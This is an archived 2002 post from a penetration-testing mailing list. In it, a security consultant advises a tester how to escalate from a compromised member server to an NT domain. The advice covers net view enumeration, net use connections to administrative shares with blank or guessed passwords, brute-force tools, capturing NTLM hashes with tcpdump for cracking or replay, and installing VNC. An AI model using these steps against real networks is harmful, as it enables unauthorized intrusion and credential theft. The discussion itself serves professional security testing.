Re: hacking a NT domain after the member server

From: hofmemi@ey.co.za
Date: Fri Jun 14 2002 - 02:01:05 EDT


Jason,

I have found the quickest way to compromise an NT domain is to try null
or commonly used passwords. ie on the server you have compromised
issue the standard domain enumeration commands:

net view /domain
and then
net view /domain:domain_name

then select a few interesting looking hosts and attempt to
connect to the the default shares IPC$, C$, Admin$ by using

net use * \\computer_name\c$ /user:administrator

there are usually a few administrator accounts with a blank or
easy to guess passwords. There are also many tools available to
automate this and try brute forcing ... ie nbtbrute, nat etc.

wrt to a command line tool for sniffing NTLM hashes your
choices are limited. I would simply use tcpdump to capture
any hashes and then u can either crack or use them in a
repaly attack with a tool like smbproxy.

Of course if the machine is seldom used you could simply
install a remote control program like VNC and load up your
GUI tools ;-)

Rgds

Michael Hofmeyr
eSecurity Services
Ernst & Young - Information Systems Assurance & Advisory Services
Wanderers Office Park, 52 Corlett Drive, Illovo, 2196
South Africa

ICQ: 114086666
Tel: +27 11 772 3784
Fax: +27 11 772 4784
GSM: +27 83 256 3716
Email: hofmemi@ey.co.za
Internet: www.ey.com/southafrica

                                                                                                                   
                    Jason
                    <cisspstudy@ya To: pen-test@securityfocus.com
                    hoo.com> cc:
                                         Subject: hacking a NT domain after the member server
                    2002/06/13
                    10:49 AM
                                                                                                                   
                                                                                                                   

Currently doing a penetration test and managed to compromise a development
SQL server (W2K/SQL 2000) that is a member of the domain.

I am trying to gather additional information from this host that will
allow me to compromise the domain.

There are no accounts on this host that are the same as the domain.
LSA secrets revealed nothing interesting.

Does anyone have any other ideas?

I would like to install a command line NTLM password sniffer. Does anyone
know of one?

However, people rarely use this server and I am unlikely to get any domain
passwords this way.

Any other ideas?

Any help appreciated.

----------------------------------------------------------------------------

This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:22 EDT